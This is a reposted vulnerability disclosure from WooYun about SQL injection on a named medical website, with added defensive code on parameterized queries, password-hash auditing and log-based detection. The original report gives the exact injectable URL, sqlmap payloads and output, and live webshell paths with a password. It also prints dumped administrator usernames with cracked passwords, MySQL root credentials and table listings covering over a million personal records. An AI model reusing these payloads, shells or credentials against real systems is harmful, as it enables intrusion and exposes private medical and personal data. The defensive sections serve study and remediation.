A vulnerability in 索医网 (root privileges / getshell / server privilege escalation) exposing over a million sensitive records (including resumes, hospital reports, etc.)

Reposted by admin on 2017-05-04 20:17:17.

Summary:
2016-03-11: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed.
2016-04-25: The vendor has actively ignored the vulnerability; details are now public.

Vulnerability overview
Defect ID: WooYun-2016-183372
Title: A vulnerability in 索医网 (root privileges / getshell / server privilege escalation) exposing over a million sensitive records (including resumes, hospital reports, etc.)
Vendor: 索医网
Author: 路人甲
Submitted: 2016-03-11 17:13
Disclosed: 2016-04-25 17:13
Type: SQL injection
Severity: High
Self-assessed Rank: 16
Status: Vendor could not be contacted, or the vendor actively ignored the report
Source: www.wooyun.org (contact WooYun with questions or for help)
Tags: excessive database account privileges, injection technique

Vulnerability details

Brief description: Please feature this on the front page...

Detailed description:
There is an injection vulnerability somewhere on 索医网. The database account is root, so sqlmap --os-shell gets a shell straight away. I wrote a one-line webshell and found the process runs with super administrator privileges, so users can be added directly; port 3389 is also directly reachable. This exposes the 10 medical/pharmaceutical websites hosted on the server, which hold a huge amount of site data... a full million-plus sensitive records... far too much data. I logged into the server and stopped there...

Injection point: http://www.suo1.cn/site/list.php?id=41 (the database account is root; --os-shell works directly)
Shell address: http://www.suo1.cn/inc/tmpukzmf.php
One-line webshell: http://www.suo1.cn/inc/1.php, password: w

```
D:/webphp/gl.suo1.cn/inc/> whoami
windows-vdiq430/administrator
```

Code area:

```
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=41) AND 5905=5905 AND (4726=4726

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=41) AND (SELECT 6578 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(6578=6578,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1492=1492

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=41) AND (SELECT * FROM (SELECT(SLEEP(5)))volC) AND (3818=3818

    Type: UNION query
    Title: MySQL UNION query (NULL) - 30 columns
    Payload: id=41) UNION ALL SELECT CONCAT(0x7162786a71,0x475a426a424e59626656,0x7176627871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[15:32:54] [INFO] the back-end DBMS is MySQL
```
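The four payload types sqlmap recorded all hinge on one defect: the `id` parameter of `list.php` is pasted into the SQL text, inside a parenthesised WHERE clause (which is why every payload opens with `41)` and closes with `(n=n`). The block below is an added example, not code from the report or from the site: it reproduces that query shape in Python against an in-memory SQLite table with constructed rows (the production stack was PHP and MySQL, but the defect and the fix are the same), shows that a condition appended to the raw parameter changes the result set while a bound, integer-validated parameter cannot, and is the check a reviewer would run on a fix before closing this ticket. The table name `wsite_news` is taken from the report's table list; its columns are assumed.

```python
"""Added example: injectable string concatenation versus a validated, bound
parameter, for the query shape behind list.php?id=41 (SQLite stand-in)."""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample rows; only the table name comes from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wsite_news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO wsite_news VALUES (?, ?)",
        [(40, "notice 40"), (41, "notice 41"), (42, "notice 42")],
    )
    return conn


def list_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """The defect: the raw GET value becomes part of the SQL text. The
    parenthesised WHERE is what the recorded payloads were shaped for."""
    sql = f"SELECT title FROM wsite_news WHERE (id={id_param})"
    return [row[0] for row in conn.execute(sql)]


ID_RE = re.compile(r"[0-9]{1,10}")


def list_hardened(conn: sqlite3.Connection, id_param: str) -> list:
    """The fix: accept only a plain integer, then bind it as a parameter so
    the driver never parses it as SQL."""
    if not ID_RE.fullmatch(id_param):
        raise ValueError("id must be a positive integer")
    sql = "SELECT title FROM wsite_news WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(id_param),))]


def list_bound_only(conn: sqlite3.Connection, id_param: str) -> list:
    """Binding alone, without validation: the payload is compared as an
    opaque string and simply matches nothing."""
    sql = "SELECT title FROM wsite_news WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (id_param,))]


def demo() -> dict:
    """Run the same inputs through all three variants and collect results."""
    conn = make_db()
    true_cond = "41) AND 5905=5905 AND (4726=4726"   # the report's payload
    false_cond = "41) AND 5905=5906 AND (4726=4726"  # same shape, false clause
    out = {
        "vuln_plain": list_vulnerable(conn, "41"),
        "vuln_true": list_vulnerable(conn, true_cond),    # row comes back
        "vuln_false": list_vulnerable(conn, false_cond),  # row disappears
        "hard_plain": list_hardened(conn, "41"),
        "bound_only": list_bound_only(conn, true_cond),
    }
    try:
        list_hardened(conn, true_cond)
        out["hard_payload"] = "accepted"
    except ValueError:
        out["hard_payload"] = "rejected"
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:13s} {value}")
```

The difference between `vuln_true` and `vuln_false` is exactly the oracle a boolean-based blind probe needs; `hard_payload` and `bound_only` show that either validation or binding closes it, and the fix should do both. The second half of the report (root DBMS account, `--os-shell`, a stager written into `/inc/`) is a separate least-privilege failure: on MySQL, sqlmap's `--os-shell` writes its stager into the web root with `SELECT ... INTO OUTFILE`, which needs the FILE privilege and a writable, guessable document root. A dedicated application account with only SELECT/INSERT/UPDATE on its own schema, `secure_file_priv` pointing away from the web root, and a web-server user that cannot write to `/inc/` would have kept this injection from becoming an administrator shell.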
```
web server operating system: Windows
web application technology: Apache 2.4.10, PHP 5.4.33
back-end DBMS: MySQL 5.0
available databases [15]:
[*] cs_suo1_cn
[*] hlyj_suo1_cn
[*] hlyje_suo1_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] qkhl1_suo1_cn
[*] suo1_site
[*] sxhl_org
[*] test
[*] w_site
[*] wanfang
[*] xzhl_suo1_cn
[*] zhuren
[*] zxy_suo1_cn

Database: suo1_site
[17 tables]
+--------------+
| ad_list      |
| hlyje_bw     |
| maga_columns |
| maga_lm      |
| maga_nr      |
| maga_series  |
| s_user       |
| s_wsite      |
| wsite_about  |
| wsite_menu   |
| wsite_mx     |
| wsite_mx_kz  |
| wsite_news   |
| wsite_qk     |
| wsite_qknr   |
| wsite_temp   |
| wx_hongbao   |
+--------------+

Database: suo1_site
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| wsite_qknr   | 230824  |
| maga_nr      | 46233   |
| maga_columns | 6376    |
| wsite_news   | 1912    |
| maga_series  | 713     |
| maga_lm      | 176     |
| wx_hongbao   | 117     |
| wsite_menu   | 71      |
| wsite_about  | 30      |
| wsite_qk     | 30      |
| s_user       | 15      |
| hlyje_bw     | 13      |
| wsite_temp   | 12      |
| wsite_mx_kz  | 10      |
| s_wsite      | 7       |
| wsite_mx     | 2       |
| ad_list      | 1       |
+--------------+---------+

Database: suo1_site
Table: s_user
[7 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| Id         | int(11)      |
| jx_qx      | varchar(255) |
| qx         | varchar(255) |
| s_email    | varchar(255) |
| s_password | varchar(255) |
| s_username | varchar(255) |
| site_id    | int(11)      |
+------------+--------------+

Database: suo1_site
Table: s_user
[15 entries]
+------------+-------------------------------------------+
| s_username | s_password                                |
+------------+-------------------------------------------+
| admin      | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| wyh        | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| hlyj       | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| zxy        | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| qkhl       | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| hlyje      | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| xzhl       | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| hlyjee     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| admin1     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| admin2     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| admin3     | 0cc175b9c0f1b6a831c399e269772661 (a)      |
| changdayu  | e10adc3949ba59abbe56e057f20f883e (123456) |
| peifang    | e10adc3949ba59abbe56e057f20f883e (123456) |
| lixiaoyan  | e10adc3949ba59abbe56e057f20f883e (123456) |
| yujiayu    | e10adc3949ba59abbe56e057f20f883e (123456) |
+------------+-------------------------------------------+

database management system users password hashes:
[*] root [2]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
        clear-text password: root
    password hash: *AECE71641589CFE947A37D283624CEF55A02C3FE
[*] test [1]:
    password hash: *A3629E3861C4C6F5C852E0FB3DA01524963E218E
[*] wf [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
        clear-text password: 123456
[*] zhuren [1]:
    password hash: *FBD85F710780DBDB507D7EC4F64F9E6E58AB00FE
```

Proof of vulnerability:
All kinds of data can be dumped directly. There are 10 medical websites on the server in total, and the volume of data is enormous... I won't pull them out one by one.

Code area:

```
Database: cs_suo1_cn
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| g_log           | 303067  |
| g_sh            | 155230  |
| g_manuscript    | 151804  |
| g_file          | 120787  |
| s_user_authors  | 109181  |
| login_log       | 82075   |
| c_email_log     | 57823   |
| c_sms_log       | 11079   |
| g_bb_w_fb       | 7882    |
| g_jl            | 5507    |
| g_cw            | 3722    |
| s_getbook_xq    | 3013    |
| s_getbook       | 2744    |
| g_bb_d_user     | 383     |
| g_manuscript_cg | 303     |
| g_bb_m_user     | 252     |
| g_bb_w          | 151     |
| s_zz_qj         | 124     |
| s_permission    | 55      |
| s_user          | 55      |
| s_zz_yjfx       | 35      |
| u_role_qh       | 30      |
| s_flow          | 28      |
| s_user_quickhf  | 28      |
| s_zz_lm         | 20      |
| s_zc            | 17      |
| s_role          | 15      |
| s_gjzt          | 11      |
| s_xl            | 11      |
| s_zz            | 11      |
| c_email         | 10      |
| c_sms           | 9       |
| g_jdlx          | 6       |
| s_yjfx          | 6       |
| s_zz_tgyj       | 3       |
| g_pdfjyg        | 2       |
| g_pdfjyg_cg     | 2       |
| g_bb_m          | 1       |
| g_magazine      | 1       |
| s_jjr           | 1       |
+-----------------+---------+

Database: hlyj_suo1_cn
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| g_log           | 341829  |
| g_sh            | 163262  |
| g_manuscript    | 157563  |
| login_log       | 127961  |
| g_file          | 127167  |
| s_user_authors  | 112475  |
| c_email_log     | 70165   |
| c_sms_log       | 23955   |
| g_bb_w_fb       | 7882    |
| g_jl            | 6466    |
| g_cw            | 4311    |
| s_getbook_xq    | 3484    |
| s_getbook       | 3172    |
| pay_zf_log      | 1371    |
| g_manuscript_cg | 404     |
| g_bb_d_user     | 383     |
| g_bb_m_user     | 252     |
| g_bb_w          | 151     |
| s_zz_qj         | 139     |
| s_user          | 98      |
| s_permission    | 58      |
| s_zz_yjfx       | 35      |
| u_role_qh       | 30      |
| s_flow          | 28      |
| s_user_quickhf  | 28      |
| s_zz_lm         | 20      |
| s_zc            | 17      |
| s_role          | 15      |
| c_sms           | 12      |
| s_gjzt          | 11      |
| s_xl            | 11      |
| s_zz            | 11      |
| c_email         | 10      |
| pay_zf          | 9       |
| g_jdlx          | 6       |
| s_yjfx          | 6       |
| s_zz_tgyj       | 3       |
| g_pdfjyg        | 2       |
| g_pdfjyg_cg     | 2       |
| g_bb_m          | 1       |
| g_magazine      | 1       |
| s_jjr           | 1       |
+-----------------+---------+

Database: xzhl_suo1_cn
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| g_log             | 4611    |
| login_log         | 3119    |
| c_email_log       | 1864    |
| g_file            | 827     |
| g_manuscript      | 805     |
| s_user_authors    | 788     |
| g_sh              | 783     |
| c_sms_log         | 466     |
| s_user            | 67      |
| s_permission      | 52      |
| g_cw              | 51      |
| s_permission_bak1 | 48      |
| s_getbook_xq      | 44      |
| s_getbook         | 43      |
| g_jl              | 42      |
| u_role_qh         | 42      |
| site_news_class   | 33      |
| s_flow            | 31      |
| s_flow_bak1       | 27      |
| s_zz_lm           | 23      |
| s_zc              | 17      |
| s_role            | 16      |
| c_sms             | 12      |
| site_info         | 12      |
| s_gjzt            | 11      |
| s_xl              | 11      |
| s_zz              | 11      |
| c_email           | 10      |
| s_zz_yjfx         | 10      |
| s_zz_qj           | 8       |
| g_jdlx            | 6       |
| g_manuscript_cg   | 6       |
| s_yjfx            | 6       |
| s_user_quickhf    | 3       |
| s_zz_tgyj         | 3       |
| g_magazine        | 1       |
| site_user         | 1       |
+-------------------+---------+
```

Fix: Just fix it...

Copyright notice: when reposting, please credit the source: 路人甲@乌云

Vulnerability response
Vendor response: The vendor could not be contacted, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)

Comments

Comment 1, 2016-03-11 17:28, 玄道 (ordinary white hat | Rank: 142 | vulnerabilities: 42 | motto: "Injection, it's just injection, injection") (+2):
Ouch, that hurts. Damn.

Comment 2, 2016-05-01 11:06, 无敌情痴 (ordinary white hat | Rank: 203 | vulnerabilities: 61 | motto: "I lack the ability to stand at the top of the security world, but I still have to keep...") (+0):
................
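Two things in the dumps above deserve a defender's follow-up beyond the report's one-line "fix it". The first is credential storage: every `s_user` row is an unsalted MD5, eleven accounts share the hash of `a` and four share the hash of `123456`, and the MySQL `root` and `wf` accounts likewise fell to trivial guesses. The block below is an added example, not code from the report or from the site, written in Python: an audit routine that flags stored MD5 values matching a short list of weak passwords and hashes shared by several accounts (the rows are a subset of the report's dump plus one constructed account, `ops_demo`), followed by the replacement storage scheme, salted PBKDF2-HMAC-SHA256 with a constant-time verify. The stored-format layout `pbkdf2_sha256$iterations$salt$hash` is this example's own convention.

```python
"""Added example: auditing an unsalted-MD5 password table and replacing it
with salted PBKDF2 storage."""
import hashlib
import hmac
import os

# Subset of the report's s_user dump (unsalted MD5) plus one constructed row.
S_USER = {
    "admin": "0cc175b9c0f1b6a831c399e269772661",
    "wyh": "0cc175b9c0f1b6a831c399e269772661",
    "hlyj": "0cc175b9c0f1b6a831c399e269772661",
    "changdayu": "e10adc3949ba59abbe56e057f20f883e",
    "peifang": "e10adc3949ba59abbe56e057f20f883e",
    "ops_demo": "5f4dcc3b5aa765d61d8327deb882cf99",  # constructed: md5("password")
}

# A deliberately tiny weak-password list; a real audit uses a breach corpus.
WEAK_PASSWORDS = ["a", "123456", "password", "admin", "root"]


def audit_md5_table(table: dict, weak: list) -> tuple:
    """Return (weak_hits, shared): accounts whose stored value is the plain
    MD5 of a weak password, and hashes that several accounts share. With no
    salt, identical passwords give identical hashes, so reuse is visible
    directly in the dump."""
    lookup = {hashlib.md5(p.encode()).hexdigest(): p for p in weak}
    weak_hits = {user: lookup[h] for user, h in table.items() if h in lookup}
    by_hash: dict = {}
    for user, h in table.items():
        by_hash.setdefault(h, []).append(user)
    shared = {h: users for h, users in by_hash.items() if len(users) > 1}
    return weak_hits, shared


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256; the iteration count is stored with the
    hash so it can be raised later without breaking verification."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    hits, shared = audit_md5_table(S_USER, WEAK_PASSWORDS)
    print("weak:", hits)
    print("shared:", shared)
    rec = hash_password("correct horse battery staple")
    print(rec, verify_password("correct horse battery staple", rec))
```

Migration is usually done lazily: keep the old MD5 column, and on each successful login with a matching MD5, write the new PBKDF2 record and clear the old value; accounts that never log in get a forced reset. The same audit applies to the MySQL accounts, where `root` with password `root` and `wf` with `123456` show the database side needs the same treatment.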
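The second follow-up is detection. The injection points sqlmap listed have recognisable shapes (`) AND n=n AND (`, `SLEEP(n)`, `FLOOR(RAND(`/`INFORMATION_SCHEMA`, `UNION ALL SELECT`, `CONCAT(0x...)`), and the `--os-shell` stager showed up as a new PHP file under `/inc/`. The block below is an added example, not code from the report: a Python classifier run over constructed Apache access-log lines (client 203.0.113.5 from the documentation range; request paths built from the report's own payloads, URL-encoded as a client would send them). The hex markers `0x7162786a71` and `0x7176627871` are the delimiters sqlmap used in this session. The `tmp<letters>.php` stager pattern is an assumption generalised from the one file name in the report, so tune it to what your own tooling observes.

```python
"""Added example: matching the report's payload shapes and stager path in
Apache access-log lines."""
import re
from urllib.parse import unquote_plus

# Shapes taken from the sqlmap payloads listed in the report.
SQLI_PATTERNS = {
    "boolean_blind": re.compile(r"\bAND\s*\(?\s*\d+\s*=\s*\d+", re.I),
    "time_blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "error_based": re.compile(r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
    "hex_marker": re.compile(r"0x7162786a71|0x7176627871|CONCAT\s*\(\s*0x", re.I),
}
# Assumed naming of the --os-shell stager (tmpukzmf.php in the report).
STAGER_RE = re.compile(r"/tmp[a-z0-9]{4,8}\.php$", re.I)

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; the paths and payloads mirror the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2016:15:30:01 +0800] "GET /site/list.php?id=41 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Mar/2016:15:32:10 +0800] "GET /site/list.php?id=41%29%20AND%205905%3D5905%20AND%20%284726%3D4726 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Mar/2016:15:32:40 +0800] "GET /site/list.php?id=41%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29volC%29%20AND%20%283818%3D3818 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Mar/2016:15:33:05 +0800] "GET /site/list.php?id=41%29%20UNION%20ALL%20SELECT%20CONCAT%280x7162786a71%2C0x475a%2C0x7176627871%29%2CNULL%23 HTTP/1.1" 200 6010',
    '203.0.113.5 - - [11/Mar/2016:15:35:12 +0800] "POST /inc/tmpukzmf.php HTTP/1.1" 200 310',
]


def classify(line: str) -> list:
    """Return the names of every indicator that fires on one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Decode once so encoded payloads match the same patterns as plain ones.
    path = unquote_plus(m.group("path"))
    hits = [name for name, rx in SQLI_PATTERNS.items() if rx.search(path)]
    if STAGER_RE.search(path.split("?", 1)[0]):
        hits.append("os_shell_stager")
    return hits


def scan(lines) -> dict:
    """Map line index -> indicators for every line that triggered anything."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

A single boolean-blind hit is noisy on its own; what made this session obvious is the sequence from one client: hundreds of `id=41) AND ...` variants, a `SLEEP(5)` probe that takes five seconds to answer, a UNION with the session's hex markers, and then a POST to a PHP file that did not exist the day before. Correlating by client and path, and alerting on new executables appearing in a directory the web server can write to, catches the escalation even when the WAF misses individual payloads.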
Source page: https://cn-sec.com/archives/43883.html